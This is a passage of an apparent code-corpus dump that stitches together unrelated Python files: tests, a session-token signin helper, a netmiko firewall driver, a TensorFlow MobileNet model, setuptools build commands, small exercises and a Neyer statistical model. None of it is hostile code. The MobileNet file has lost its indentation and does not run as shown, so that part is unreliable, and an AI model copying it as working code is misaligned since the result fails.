# Features expected to be present in the test data vs. the full set.
known_features = set([unigram_feature, bigram_feature, an_feature])
all_features = set([unigram_feature, bigram_feature, an_feature, unk_unigram_feature, unk_bigram_feature])
@pytest.fixture(scope='module')
def small_vectors():
    # Module-scoped: the TSV is parsed once and shared by all tests here.
    return Vectors.from_tsv('tests/resources/thesauri/small.txt.events.strings')
@pytest.fixture
def vectors_a():
    # Per-test fixture for the exp0-0a vector file.
    return Vectors.from_tsv('tests/resources/exp0-0a.strings')
@pytest.fixture
def ones_vectors():
    # Per-test fixture for the all-ones vector file (with word/PoS entries).
    return Vectors.from_tsv('tests/resources/ones.vectors.txt')
@pytest.fixture
def ones_vectors_no_pos():
    # Entries in this file carry no PoS suffix, so the word/PoS format
    # check must be disabled.
    return Vectors.from_tsv('tests/resources/ones.vectors.nopos.txt',
                            enforce_word_entry_pos_format=False)
def test_unigr_source_get_vector(small_vectors):
    """Vectors, vocabulary order, and missing-entry behaviour are correct."""
    # a/N amod:c 2 T:t1 1 T:t2 2 T:t3 3
    assert_array_equal(
        small_vectors.get_vector('a/N').todense(),
        [[0., 2., 0., 1., 2., 3., 0., 0.]]
    )
    # vocab is in sorted order
    expected_columns = ['also/RB', 'amod:c', 'now/RB',
                        't:t1', 't:t2', 't:t3', 't:t4', 't:t5']
    assert expected_columns == small_vectors.columns
    for missing_entry in ('jfhjgjdfyjhgb/N', 'jfhjgjdfyjhgb/J'):
        assert small_vectors.get_vector(missing_entry) is None
def test_unigr_source_contains(small_vectors):
    """
    Test if the unigram model only accepts unigram features
    """
    assert str(unigram_feature) in small_vectors
    # Fixed: the original tuple listed unk_unigram_feature twice and never
    # exercised unk_bigram_feature; check each non-unigram/unknown feature once.
    for thing in (unk_unigram_feature, bigram_feature, unk_bigram_feature):
        assert str(thing) not in small_vectors
1635540 | from typing import Optional
import keyring
import os
from ..util import KEYRING_SERVICE, is_plain_secret_storage, fatal, run, session_file
def signin(account: str) -> Optional[str]:
    """Sign in to *account* via the CLI and persist the session token.

    The token goes to a 0600 session file when the platform's secret
    storage is plain text, to the OS keyring otherwise. Returns the
    token on success; failures are reported through fatal().
    """
    status, stdout, stderr = run(["signin", "--raw", f"--account={account}"], silent=True)
    if not status:
        fatal(stderr)
    if is_plain_secret_storage():
        try:
            # 0o600: the session token must be readable by the user only.
            fd = os.open(session_file(account), os.O_CREAT | os.O_WRONLY, 0o600)
            with open(fd, "w") as handle:
                handle.write(stdout)
        except Exception as exc:
            fatal(f"cannot write session file: {type(exc).__name__}")
        else:
            return stdout
    else:
        try:
            keyring.set_password(KEYRING_SERVICE, account, stdout)
        except keyring.errors.KeyringError as exc:
            fatal(f"cannot write session file: {type(exc).__name__}")
        else:
            return stdout
| StarcoderdataPython |
8194435 | <reponame>AAm-kun/netmiko
import time
from netmiko.base_connection import BaseConnection
class WatchguardFirewareSSH(BaseConnection):
    """
    Implements methods for communicating with Watchguard Firebox firewalls.
    """
    def session_preparation(self):
        """
        Prepare the session after the connection has been established.
        Set the base prompt for interaction ('#').
        """
        self._test_channel_read()
        self.set_base_prompt()
        # Clear the read buffer
        time.sleep(0.3 * self.global_delay_factor)
        self.clear_buffer()
    def check_config_mode(self, check_string=")#", pattern="#"):
        """
        Checks if the device is in configuration mode or not.
        """
        # Config-mode prompts end in ')#' on this platform.
        return super().check_config_mode(check_string=check_string, pattern=pattern)
    def config_mode(
        self, config_command: str = "configure", pattern: str = r"\#", re_flags: int = 0
    ) -> str:
        """Enter configuration mode via the 'configure' command."""
        return super().config_mode(
            config_command=config_command, pattern=pattern, re_flags=re_flags
        )
    def exit_config_mode(self, exit_config="exit", pattern="#"):
        """Leave configuration mode via the 'exit' command."""
        return super().exit_config_mode(exit_config=exit_config, pattern=pattern)
    def save_config(self, *args, **kwargs):
        """No save config on Watchguard."""
        pass
| StarcoderdataPython |
def isPerfect(n):
    """Return True if n is a perfect number, i.e. n equals the sum of its
    proper divisors (e.g. 6 = 1 + 2 + 3).

    Fixed: the original returned True for n == 1 (the running sum starts at
    1 and the loop never runs), but 1 has no proper-divisor sum equal to
    itself and is not perfect.
    """
    if n <= 1:
        return False
    s = 1  # 1 divides every n > 1
    k = 2
    # Walk divisor pairs (k, n//k) up to sqrt(n), counting each side once.
    while(k * k <= n):
        if n % k == 0:
            s += k
            m = n // k
            if m != k:  # avoid double-counting a square root divisor
                s += m
        k += 1
    return s == n
# Read the search bounds from the user and print every perfect number in
# the half-open interval [a, b).
a = int(input("a: "))
b = int(input("b: "))
for i in range(a,b):
    if isPerfect(i):
        print(i)
| StarcoderdataPython |
9716103 | <reponame>Sourolio10/face-antispoofing-using-mobileNet<filename>model.py
import tensorflow as tf
from layers import depthwise_separable_conv2d, conv2d, avg_pool_2d, dense, flatten, dropout
import os
from utils import load_obj, save_obj
import numpy as np
class MobileNet:
"""
MobileNet Class
"""
def __init__(self,
args):
# init parameters and input
self.X = None
self.y = None
self.logits = None
self.is_training = None
self.loss = None
self.regularization_loss = None
self.cross_entropy_loss = None
self.train_op = None
self.accuracy = None
self.y_out_argmax = None
self.summaries_merged = None
self.args = args
self.mean_img = None
self.nodes = dict()
self.pretrained_path = os.path.realpath(self.args.pretrained_path)
self.__build()
def __init_input(self):
with tf.variable_scope('input'):
# Input images
self.X = tf.placeholder(tf.float32,
[self.args.batch_size, self.args.img_height, self.args.img_width,
self.args.num_channels])
# Classification supervision, it's an argmax. Feel free to change it to one-hot,
# but don't forget to change the loss from sparse as well
self.y = tf.placeholder(tf.int32, [self.args.batch_size])
# is_training is for batch normalization and dropout, if they exist
self.is_training = tf.placeholder(tf.bool)
def __init_mean(self):
# Preparing the mean image.
img_mean = np.ones((1, 224, 224, 3))
img_mean[:, :, :, 0] *= 103.939
img_mean[:, :, :, 1] *= 116.779
img_mean[:, :, :, 2] *= 123.68
self.mean_img = tf.constant(img_mean, dtype=tf.float32)
def __build(self):
self.__init_global_epoch()
self.__init_global_step()
self.__init_mean()
self.__init_input()
self.__init_network()
self.__init_output()
def __init_network(self):
with tf.variable_scope('mobilenet_encoder'):
# Preprocessing as done in the paper
with tf.name_scope('pre_processing'):
preprocessed_input = (self.X - self.mean_img) / 255.0
# Model is here!
conv1_1 = conv2d('conv_1', preprocessed_input, num_filters=int(round(32 * self.args.width_multiplier)),
kernel_size=(3, 3),
padding='SAME', stride=(2, 2), activation=tf.nn.relu6,
batchnorm_enabled=self.args.batchnorm_enabled,
is_training=self.is_training, l2_strength=self.args.l2_strength, bias=self.args.bias)
self.__add_to_nodes([conv1_1])
############################################################################################
conv2_1_dw, conv2_1_pw = depthwise_separable_conv2d('conv_ds_2', conv1_1,
width_multiplier=self.args.width_multiplier,
num_filters=64, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv2_1_dw, conv2_1_pw])
conv2_2_dw, conv2_2_pw = depthwise_separable_conv2d('conv_ds_3', conv2_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=128, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv2_2_dw, conv2_2_pw])
############################################################################################
conv3_1_dw, conv3_1_pw = depthwise_separable_conv2d('conv_ds_4', conv2_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=128, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv3_1_dw, conv3_1_pw])
conv3_2_dw, conv3_2_pw = depthwise_separable_conv2d('conv_ds_5', conv3_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=256, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv3_2_dw, conv3_2_pw])
############################################################################################
conv4_1_dw, conv4_1_pw = depthwise_separable_conv2d('conv_ds_6', conv3_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=256, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv4_1_dw, conv4_1_pw])
conv4_2_dw, conv4_2_pw = depthwise_separable_conv2d('conv_ds_7', conv4_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv4_2_dw, conv4_2_pw])
############################################################################################
conv5_1_dw, conv5_1_pw = depthwise_separable_conv2d('conv_ds_8', conv4_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_1_dw, conv5_1_pw])
conv5_2_dw, conv5_2_pw = depthwise_separable_conv2d('conv_ds_9', conv5_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_2_dw, conv5_2_pw])
conv5_3_dw, conv5_3_pw = depthwise_separable_conv2d('conv_ds_10', conv5_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_3_dw, conv5_3_pw])
conv5_4_dw, conv5_4_pw = depthwise_separable_conv2d('conv_ds_11', conv5_3_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_4_dw, conv5_4_pw])
conv5_5_dw, conv5_5_pw = depthwise_separable_conv2d('conv_ds_12', conv5_4_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_5_dw, conv5_5_pw])
conv5_6_dw, conv5_6_pw = depthwise_separable_conv2d('conv_ds_13', conv5_5_pw,
width_multiplier=self.args.width_multiplier,
num_filters=1024, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_6_dw, conv5_6_pw])
############################################################################################
conv6_1_dw, conv6_1_pw = depthwise_separable_conv2d('conv_ds_14', conv5_6_pw,
width_multiplier=self.args.width_multiplier,
num_filters=1024, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv6_1_dw, conv6_1_pw])
############################################################################################
avg_pool = avg_pool_2d(conv6_1_pw, size=(7, 7), stride=(1, 1))
dropped = dropout(avg_pool, self.args.dropout_keep_prob, self.is_training)
self.logits = flatten(conv2d('fc', dropped, kernel_size=(1, 1), num_filters=self.args.num_classes,
l2_strength=self.args.l2_strength,
bias=self.args.bias))
self.__add_to_nodes([avg_pool, dropped, self.logits])
def __init_output(self):
with tf.variable_scope('output'):
self.regularization_loss = tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
self.cross_entropy_loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=self.y, name='loss'))
self.loss = self.regularization_loss + self.cross_entropy_loss
# Important for Batch Normalization
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
self.train_op = tf.train.AdamOptimizer(learning_rate=self.args.learning_rate).minimize(self.loss)
self.y_out_argmax = tf.argmax(tf.nn.softmax(self.logits), axis=-1, output_type=tf.int32)
self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.y, self.y_out_argmax), tf.float32))
# Summaries needed for TensorBoard
with tf.name_scope('train-summary-per-iteration'):
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('acc', self.accuracy)
self.summaries_merged = tf.summary.merge_all()
def __restore(self, file_name, sess):
    """Assign pickled ImageNet weights to the encoder variables in `sess`.

    Variables are matched by substring: a saved key matches any variable
    whose name contains it. If the weights file is missing or unreadable,
    the model is left with its random initialization.
    """
    try:
        print("Loading ImageNet pretrained weights...")
        variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mobilenet_encoder')
        pretrained = load_obj(file_name)  # renamed from `dict` to avoid shadowing the builtin
        run_list = [tf.assign(variable, value)
                    for variable in variables
                    for key, value in pretrained.items()
                    if key in variable.name]
        sess.run(run_list)
        print("ImageNet Pretrained Weights Loaded Initially\n\n")
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit.
        print("No pretrained ImageNet weights exist. Skipping...\n\n")
def load_pretrained_weights(self, sess):
    """Initialize the encoder from the pickled ImageNet weights file."""
    self.__restore(self.pretrained_path, sess)
def __add_to_nodes(self, nodes):
    """Register each op in the model's node registry, keyed by op name."""
    self.nodes.update({node.name: node for node in nodes})
def __init_global_epoch(self):
    """
    Create a global epoch tensor so training progress survives checkpoints.
    :return:
    """
    with tf.variable_scope('global_epoch'):
        # -1 means "no epoch completed yet"; not trainable, but checkpointed.
        self.global_epoch_tensor = tf.Variable(-1, trainable=False, name='global_epoch')
        # Feed the desired epoch through the placeholder, then run the assign op.
        self.global_epoch_input = tf.placeholder('int32', None, name='global_epoch_input')
        self.global_epoch_assign_op = self.global_epoch_tensor.assign(self.global_epoch_input)
def __init_global_step(self):
    """
    Create a global step variable to be a reference to the number of iterations
    :return:
    """
    with tf.variable_scope('global_step'):
        # Starts at 0; not trainable, but checkpointed alongside the weights.
        self.global_step_tensor = tf.Variable(0, trainable=False, name='global_step')
        # Feed the desired step through the placeholder, then run the assign op.
        self.global_step_input = tf.placeholder('int32', None, name='global_step_input')
        self.global_step_assign_op = self.global_step_tensor.assign(self.global_step_input)
| StarcoderdataPython |
11219911 | <gh_stars>0
import os
from setuptools import Command
from setuptools.command.develop import develop
from setuptools.command.install_lib import install_lib
import subprocess
import sys
from typing import List, Optional
from rustypy.module import RustyModule
class RustCommand(Command):
    """setuptools command that compiles and deploys rust extension modules."""

    description = "build rust extension"
    user_options = [
        ('modules=', None, 'list of rust modules'),
        ('release=', None, 'boolean for --release flag')
    ]

    def initialize_options(self) -> None:
        # String annotation: evaluating RustyModule eagerly at runtime would
        # raise NameError when rustypy is not importable.
        self.modules: Optional[List["RustyModule"]] = None
        self.release = True

    def finalize_options(self) -> None:
        pass

    def run(self) -> None:
        """Compile every module first, then deploy all of them."""
        if self.modules is None:
            return
        for module in self.modules:
            self.compile(module)
        for module in self.modules:
            self.deploy(module)

    def compile(self, module: "RustyModule") -> None:
        """Invoke cargo to build one module, streaming its stderr through."""
        # BUG FIX: the binary is 'cargo' (lowercase); 'Cargo' is not found
        # on case-sensitive filesystems (Linux).
        args = ['cargo', 'build']
        if self.release:
            args.append('--release')
        args.extend([
            '--manifest-path',
            '{}'.format(os.path.join(module.path, 'Cargo.toml')),
            '--color',
            'always',
        ])
        print((
            "[rustypy] Compiling rust extension module '{}'"
            .format(module.name))
        )
        # stdout is never read; discard it instead of piping so a chatty
        # build cannot fill the pipe buffer and deadlock the child process.
        process = subprocess.Popen(
            args,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.PIPE,
            encoding='utf-8',
        )
        for line in iter(process.stderr.readline, ''):
            sys.stderr.write(line)
            sys.stderr.flush()
        process.wait()
        if process.returncode != 0:
            raise Exception(
                "Failed to compile '{}' module".format(module.name)
            )

    def deploy(self, module: "RustyModule") -> None:
        """Copy the built shared library into the package build tree."""
        mode = 'release' if self.release else 'debug'
        lib_path = os.path.join(
            module.path,
            'target',
            mode,
            module._lib_name
        )
        build_ext = self.get_finalized_command('build_ext')
        ext_fullpath = build_ext.get_ext_fullpath(module.name)
        self.mkpath(os.path.dirname(ext_fullpath))
        self.copy_file(lib_path, ext_fullpath)
build_rust = RustCommand
class develop_with_rust(develop):
    """'develop' command variant that also builds the rust extension."""

    def run(self) -> None:
        # Standard editable install first, then compile the rust modules.
        super().run()
        self.run_command('build_rust')
class install_lib_with_rust(install_lib):
    """'install_lib' command variant that also builds the rust extension."""

    def build(self) -> None:
        # super() instead of the explicit install_lib.build(self) call,
        # consistent with how develop_with_rust chains to its parent.
        super().build()
        self.run_command('build_rust')
| StarcoderdataPython |
3259314 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from setuptools import setup
# Package layout: both top-level packages, plus all bundled data files.
packages = ['codesync', 'notificator']
package_data = {'': ['*']}
# Expose a `codesync` console script backed by codesync.cli:run.
entry_points = {'console_scripts': ['codesync = codesync.cli:run']}

# Distribution metadata (author/maintainer fields are dataset-anonymized).
setup_kwargs = {
    'name': 'codesync',
    'version': '1.0',
    'description': 'Sync your code changes as you make them',
    'long_description': 'Sync your code changes as you make them',
    'author': 'Basit',
    'author_email': '<EMAIL>',
    'maintainer': '<NAME>',
    'maintainer_email': '<EMAIL>',
    'url': 'https://github.com/codesyncapp/codesync.git',
    'packages': packages,
    'package_data': package_data,
    'entry_points': entry_points,
    'python_requires': '>=3.9,<3.10',
    'include_package_data': True
}

setup(**setup_kwargs)
| StarcoderdataPython |
# Number of test cases to process.
n = int(input("> "))
# One answer list ("TAK"/"NIE" per word) per test case.
odpowiedzi = [[] for x in range(n)]
def mozna_stworzyc(literki: list, slowo: str) -> bool:
    """Return True if `slowo` ("word") can be spelled from `literki` ("letters").

    Each letter of the word is upper-cased and must consume one matching
    (uppercase) entry from the letter pool. Runs in O(len(literki) + len(slowo))
    instead of the original O(n*m) list.remove loop, and returns early on the
    first missing letter. Unlike the original it does not mutate `literki`
    (the caller passes a throwaway copy anyway).
    """
    from collections import Counter
    pool = Counter(literki)
    for litera in slowo:
        klucz = litera.upper()
        if pool[klucz] <= 0:
            return False
        pool[klucz] -= 1
    return True
# Process each of the n test cases.
for i in range(n):
    # x is read but unused by the algorithm; y is the number of words to check.
    x, y = input("Wpisz x oraz y: ").split()
    zbior = input("Wpisz zbiór liter: ").split()
    for j in range(int(y)):
        slowo = input(f"Wpisz slowo nr. {j + 1}: ")
        # Pass a copy so the letter pool stays intact for the next word.
        mozna = mozna_stworzyc(zbior.copy(), slowo)
        if mozna:
            odpowiedzi[i].append("TAK")
        else:
            odpowiedzi[i].append("NIE")

# Print the answers for every test case, with a blank line between cases.
for odp in odpowiedzi:
    for x in odp:
        print(x)
    print()
3539084 | <reponame>wu-uw/OpenCompetition
import pandas as pd
from sklearn import datasets
from gplearn.genetic import SymbolicTransformer
from sklearn.model_selection import train_test_split
# def data_prepare():
# boston = datasets.load_boston()
# boston_feature = pd.DataFrame(boston.data, columns=boston.feature_names)
# boston_label = pd.Series(boston.target).to_frame("TARGET")
# boston = pd.concat([boston_label, boston_feature], axis=1)
# return boston
#
# data = data_prepare()
#
# function_set = ['add', 'sub', 'mul', 'div', 'log', 'sqrt', 'abs', 'neg', 'max', 'min']
#
# gp1 = SymbolicTransformer(generations=10, population_size=1000,
# hall_of_fame=100, n_components=10,
# function_set=function_set,
# parsimony_coefficient=0.0005,
# max_samples=0.9, verbose=1,
# random_state=0, n_jobs=3)
#
# x_train, x_test, y_train, y_test = train_test_split(data, data.TARGET, test_size=0.2, random_state=10)
#
# gp_train_feature = gp1.transform(x_train)
# gp_test_feature = gp1.transform(x_test)
#
# train_idx = x_train.index
# test_idx = x_test.index
#
# new_feature_name = [str(i)+'V' for i in range(1, 11)]
# train_new_feature = pd.DataFrame(gp_train_feature, columns=new_feature_name, index=train_idx)
# test_new_feature = pd.DataFrame(gp_test_feature, columns=new_feature_name, index=test_idx)
# x_train_0 = pd.concat([x_train, train_new_feature], axis=1)
# x_test_0 = pd.concat([x_test, test_new_feature], axis=1)
#
# new_x_data = pd.concat([x_train_0, x_test_0], axis=0)
# new_data = pd.concat([data['TARGET'], new_x_data], axis=1)
# #print(new_data.columns)
class GPConfig:
    """Configuration container for gplearn SymbolicTransformer feature runs."""

    # Default primitive set for symbolic feature construction.
    DEFAULT_FUNCTION_SET = ['add', 'sub', 'mul', 'div', 'log', 'sqrt',
                            'abs', 'neg', 'max', 'min']

    def __init__(self, generation=1000, population_size=5000, hall_of_fame=100, n_components=10,
                 parsimony_coefficient=0.0005, max_samples=0.9, function_set=None):
        """Store SymbolicTransformer hyperparameters.

        function_set : list of str, optional
            Primitive functions available to the transformer. Defaults to
            DEFAULT_FUNCTION_SET. Generalizes the previously hard-coded
            list; existing call sites are unaffected.
        """
        self.generation = generation
        self.population_size = population_size
        self.hall_of_fame = hall_of_fame
        self.n_components = n_components
        self.parsimony_coefficient = parsimony_coefficient
        self.max_samples = max_samples
        # Copy to avoid sharing one mutable list across instances.
        self.function_set = list(function_set) if function_set is not None \
            else list(self.DEFAULT_FUNCTION_SET)
def gp_feature_generator(df_train, df_test, y_name, var_list, gp_config):
    """Generate genetic-programming features for the train/test frames.

    TODO: not yet implemented. Intended behavior (see the commented-out
    example above): fit a gplearn SymbolicTransformer on df_train[var_list]
    against df_train[y_name] using the settings in gp_config, then append
    the transformed features to both frames. Parameters are currently unused.
    """
    pass
| StarcoderdataPython |
3213389 | <filename>senpy/neyer.py
# -*- coding: utf-8 -*-
import numpy as np
from scipy.optimize import minimize, brute, fmin
from .confidence import (parametric_bootstrap, nonparametric_bootstrap,
delta, contour_walk, increase_bounds,
HomogeneousResult)
from .plotting import plot_probability as pp, plot_confidence_region as pcr
import copy
from .utils import (custom_log, _round, check_bounds, check_diff,
check_success, check_fail)
class Neyer():
    """
    The Neyer model. Given an assumed form for the latent distribution,
    either 'normal', 'logistic', or 'log-logistic', the maximum likelihood
    estimates of the distribution parameters are computed. Neyer also provides
    a sequential design algorithm.

    Parameters
    ----------
    latent : string, optional
        DESCRIPTION. The form of the latent distribution. Either 'normal',
        'logistic', or 'log-logistic'. The default is 'normal'.
    inverted : boolean, optional
        DESCRIPTION. If the probability of a 'go' increases as the stimulus
        level decreases, then the data is 'inverted'. The default is False.
    method : string, optional
        DESCRIPTION. Name of the optimization routine called when computing
        the maximum likelihood estimates. The default is 'L-BFGS-B'.
    num_restarts : int, optional
        DESCRIPTION. The number of random initializations to use when
        maximizing the likelihood function. Note, the available latent
        distributions only use two parameters. Consequently, the resulting
        likelihood function is typically convex. The default is 3.
    t1_min : float, optional
        DESCRIPTION. When using the sequential design algorithm and starting
        with no (or minimal) data, an initial guess on the lower bound of
        the first parameter, theta_1, is required. For the normal and
        logistic distributions theta_1 is mu. For the log-logistic distribution
        theta_1 is alpha. If None is provided and the sequential algorithm
        is called, the program will prompt the user for the value.
        The default is None.
    t1_max : float, optional
        DESCRIPTION. The initial guess for the upper bound of theta_1.
        See t1_min for more details. The default is None.
    t2_guess : float, optional
        DESCRIPTION. The initial guess for theta_2. Required when using the
        sequential design algorithm. See t1_min for more details. For the
        normal and logistic distributions, theta_2 is sigma. For the log-logistic
        distribution, theta_2 is beta. The default is None.
    precision : int, optional
        DESCRIPTION. Number of decimal points to include in the final
        output. The default is 8.
    resolution : float, optional
        DESCRIPTION. The smallest change in stimulus level available. For
        example, a drop-weight apparatus may only have adjustments at
        quarter inch intervals. Thus, the algorithm should not suggest testing
        at 12.105 inches, etc. The default is None.
    lower_bound : float, optional
        DESCRIPTION. The lowest stimulus level a user can physically test.
        The default is None.
    upper_bound : float, optional
        DESCRIPTION. The highest stimulus level a user can physically test.
        The default is None.
    hist : boolean, optional
        DESCRIPTION. If True the determinant of the information matrix is
        computed over a range of stimulus levels at each stage of the
        sequential design. Typically used for debugging only!
        The default is False.
    log_file : str, optional
        DESCRIPTION. File path for a log file. The log consists of the
        steps taken during the sequential design algorithm.
        The default is None.
    """

    # Optimizers supported for maximum-likelihood fitting.
    available_opt_methods = ('L-BFGS-B', 'SLSQP', 'TNC')
def __init__(self, latent='normal', inverted=False,
             method='L-BFGS-B', num_restarts=3,
             t1_min=None, t1_max=None, t2_guess=None,
             precision=8, resolution=None,
             lower_bound=None, upper_bound=None,
             hist=False, log_file=None):
    """Configure the model; see the class docstring for parameter details."""
    self.inverted = inverted
    self.theta = None
    self.latent = latent
    self.method = method
    self.num_restarts = num_restarts
    # Fall back to sane defaults rather than raising on bad config values.
    if self.num_restarts < 1:
        print('Number of restarts must be greater than or eqaul to 1.')
        print('Defaulting to 3.')
        self.num_restarts = 3
    if self.method not in self.available_opt_methods:
        print("""method '{}' not understood.
Defaulting to L-BFGS-B.
Please choose from {}""".format(self.method,
                                self.available_opt_methods))
        self.method = 'L-BFGS-B'
    # Bind the distribution-specific functions (cdf, cost, Hessian, ...)
    # for the requested latent distribution.
    if latent == 'normal':
        from .norm_funcs import function_dictionary
    elif latent == 'logistic':
        from .logistic_funcs import function_dictionary
    elif latent == 'log-logistic':
        from .log_logistic_funcs import function_dictionary
    else:
        raise ValueError("""Value for "latent" not understood.
Must be "normal", "logistic", or "log-logistic".""")
    self.pred = function_dictionary['pred']
    self.opt_config = function_dictionary['opt_config']
    self.cost_func = function_dictionary['cost']
    self.cost_deriv = function_dictionary['cost_deriv']
    self.est_names = function_dictionary['estimate_names']
    self.Hessian = function_dictionary['Hessian']
    self.cdf_deriv = function_dictionary['cdf_deriv']
    self.info = function_dictionary['info']
    self.precision = precision
    # State flags for the sequential design phases (binary search ->
    # overlap search -> maximum-likelihood selection).
    self.start = True
    self.binary = True
    self.overlap = True
    self.mle = True
    self.lower_bound = lower_bound
    self.upper_bound = upper_bound
    self.hist = hist
    if isinstance(log_file, str):
        self.log_file = log_file
        # Truncate/create the log file up front.
        file_obj = open(log_file, 'w')
        file_obj.close()
    if resolution != None:
        # NOTE(review): when resolution is None, self.resolution is never
        # set; downstream code must guard against the missing attribute — confirm.
        self.resolution = resolution
    if self.hist == True:
        # Debug traces of the information-matrix determinant per stage.
        self.det_vals = []
        self.det_res = []
        self.x_pts = []
    self.t1_min = t1_min
    self.t1_max = t1_max
    self.t2_guess = t2_guess
    # Data containers: column vectors of stimuli and binary responses.
    self.X = np.asarray([]).reshape((-1,1))
    self.Y = np.asarray([]).reshape((-1,1))
    self.theta = np.array([np.nan, np.nan])
    self.observed_info = np.empty((2,2))
    # Size of self.X the last time next_pt() consumed new data (-1 = never).
    self.updated = -1
def fit(self, X, Y):
    """
    Compute the maximum likelihood estimates of the distribution parameters.

    Parameters
    ----------
    X : 2D array
        The tested stimulus levels. Must be of shape (n_pts, 1)
    Y : array
        The observed response at each stimulus level. 1 for 'go' and 0
        for 'no-go'.

    Returns
    -------
    self
    """
    if X.ndim != 2:
        raise ValueError("X must be of shape [n_examples, 1]")
    if X.shape[0] != Y.shape[0]:
        raise ValueError("""input and output must have the same number of rows!
shapes {} and {} do not match.""".format(X.shape, Y.shape))
    Y = Y.reshape((-1,1))
    self.Y = Y.copy()
    self.X = X
    # Internally always optimize in the non-inverted orientation.
    if self.inverted:
        Y = np.logical_not(Y).astype(int)
    # The MLE does not exist for homogeneous (all-go or all-no-go) data.
    if check_success(Y) or check_fail(Y):
        raise HomogeneousResult('Need to have positive AND negative responses present in the data in order to call fit.')
    thetas = []
    costs = []
    # Multi-start optimization with random initial theta drawn from
    # data-driven bounds supplied by the latent distribution's config.
    t1_low, t1_high, t2_low, t2_high, bounds = self.opt_config(self.X)
    for i in range(self.num_restarts):
        theta_0 = [np.random.uniform(t1_low, t1_high),
                   np.random.uniform(t2_low, t2_high)]
        theta_0 = np.array(theta_0)
        res = minimize(self.cost_func, theta_0,
                       args = (self.X, Y),
                       method=self.method,
                       jac=self.cost_deriv,
                       bounds=bounds)
        thetas.append(res.x)
        costs.append(res.fun)
    thetas = np.asarray(thetas)
    costs = np.asarray(costs)
    # Keep the restart with the lowest negative log-likelihood.
    best_run = np.argmin(costs)
    self.theta = thetas[best_run]
    self.cost = costs[best_run]
    return self
def get_estimators(self):
    """Return the stored parameter estimates, e.g. [mu, sigma] or [alpha, beta].

    Returns
    -------
    array
        Current parameter estimates, shape (2,).

    Raises an Exception when the model has not been fit, or when the data
    contain no overlap (not enough information to estimate theta).
    """
    if self.theta is None:
        raise Exception('Model not yet trained!')
    if check_diff(self.X, self.Y, self.inverted) > 0:
